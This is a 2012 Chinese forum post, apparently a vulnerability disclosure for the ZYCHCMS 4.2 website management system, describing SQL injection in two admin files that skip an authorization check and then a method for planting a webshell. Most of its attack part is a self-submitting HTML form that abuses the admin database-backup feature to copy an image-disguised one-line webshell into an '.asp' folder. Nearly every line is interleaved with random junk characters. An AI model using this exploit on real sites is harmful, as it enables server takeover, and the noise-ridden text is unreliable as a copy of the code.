( O# k" `! A; ]1 [/ q6 M' B( I: d" F* Z! I/ B
7 H' H9 V5 d5 y; P
/ z- j* |; t0 z# {" A$ N影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
( v; n, W7 q! ? ①SQL注射漏洞2 V" Z! p Q+ |
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp2 R- y- D& q( z1 O" i! ~; V
漏洞原因:未过滤
. t6 ?$ g G/ D0 u9 V5 [ 漏洞代码:6 n. p/ i6 E$ y- L! [7 x
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
0 K. o# W O! E4 m* i6 Z 修复方法:在文件开头加入代码) c5 W3 D) m' t- l! M2 d, x
6 K1 e9 ]6 I: ^6 D4 V
- I" {& z y. o. @0 D5 c②后台拿WBSHELL( Z) N: B/ T, V; ]8 ]/ M( Q
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。& `3 {9 f; [& I+ l- D* c& C
这里在网上找了一个,改了下,将就着用。
( Y* Y/ \ U, E5 i @3 T% d 以下是代码本地提交代码
, U* W7 e/ o; x8 C% } ) r6 A( {7 O( j9 p! d& o" J* i
# |9 c# C) }9 h& x8 f
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>) ~ y- T! q& k$ o, c
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>: s" V% Z/ i* a0 R
<tr>
y3 M( w! t7 d5 k7 s% E3 r <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
; s" ~0 B: X5 |$ g </tr>1 K7 y% o7 s" `8 Z
<tr>
% V/ h# X6 g2 G) r! i <td bgcolor=”#FFFFFF”><span class=”back_southidc”>& C' X N0 U0 T8 C* }
</span>
9 Y: J7 N$ `" U8 b, \ <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
1 e+ {* ]6 x1 B5 |% S- O7 a# _) \ <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >2 K! i3 z p5 ?4 g
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
' v+ ~0 x$ Z: e <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
3 u0 ^+ b/ M5 V' [0 s: j# ? <div align=”left”>
9 u4 }5 D" {: P& K <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
& Y- {5 C ^+ R9 J1 @! U <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>( \+ `2 v8 v5 \+ K# X( ]2 I6 J
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />% ~- I) C$ m2 Q' J9 Z; l7 M8 ~
</div></td>5 M( ] H; y" q9 j8 E
</tr>
+ P& F2 J+ _$ `" J9 A9 P8 c, m0 S <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>7 S6 O; b1 c+ o7 V
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>/ P% K& o9 N: j: r( Z
<td class=”td”><div align=”left”>
2 q" Y4 |* P4 ^, V+ C/ [8 x" P <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
# M# b( ]+ l% Y [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
2 K, w* J1 H- d2 J& y </tr>3 a0 {6 j0 Z& t0 S$ I
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>% `: x5 z( N2 R$ ^3 z: J
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>% v4 O3 y9 p* L% l" i
<td class=”td”><div align=”left”>! b* B% V5 T P: b% `8 X4 O% i1 ~: u
<input type=”submit” value=”确定备份” class=”btn”/ q4 p' E I4 {" s$ v2 x2 @( X
</div></td>4 s8 Z! @0 e3 W# e( b" ?
</tr>
2 E- O8 l% o/ W# j4 V( ~ </table></td></tr></form>
# L% P5 b+ M. c. y W </table>
( R5 L- _8 ` q: J% W) v </td>
, k! ]6 C* L' b- c* p0 ]% G5 K& ] </tr>- A2 m! i- F8 C1 _: \
</table>
# s) P5 S7 x2 {) W <script>5 u( T: T0 ?6 Y# o3 R
document.all.add.submit();+ Z& J5 `5 t& X' h1 k
</script>
9 F! C$ Z! W# x 7 [* ^: h6 }9 D
1 H# d) w1 v( f1 A, y4 k+ L. y1 ~8 {: O/ Y! c& [
5 T# U8 b' }' K$ ?! |0 U. T& P [* o- T5 c9 J4 K# G
2 h) r9 }' {; W0 H' f, B
) E* A4 i2 Y4 x9 q5 n& }) V% n
( x- R9 P$ H! }2 ?, S: d+ W
& W0 R3 z' [6 S% F2 O! E U* K5 h6 f) |8 }2 t/ t) Z& I
|
发表于 2012-9-10 21:09:51
收藏
支持
反对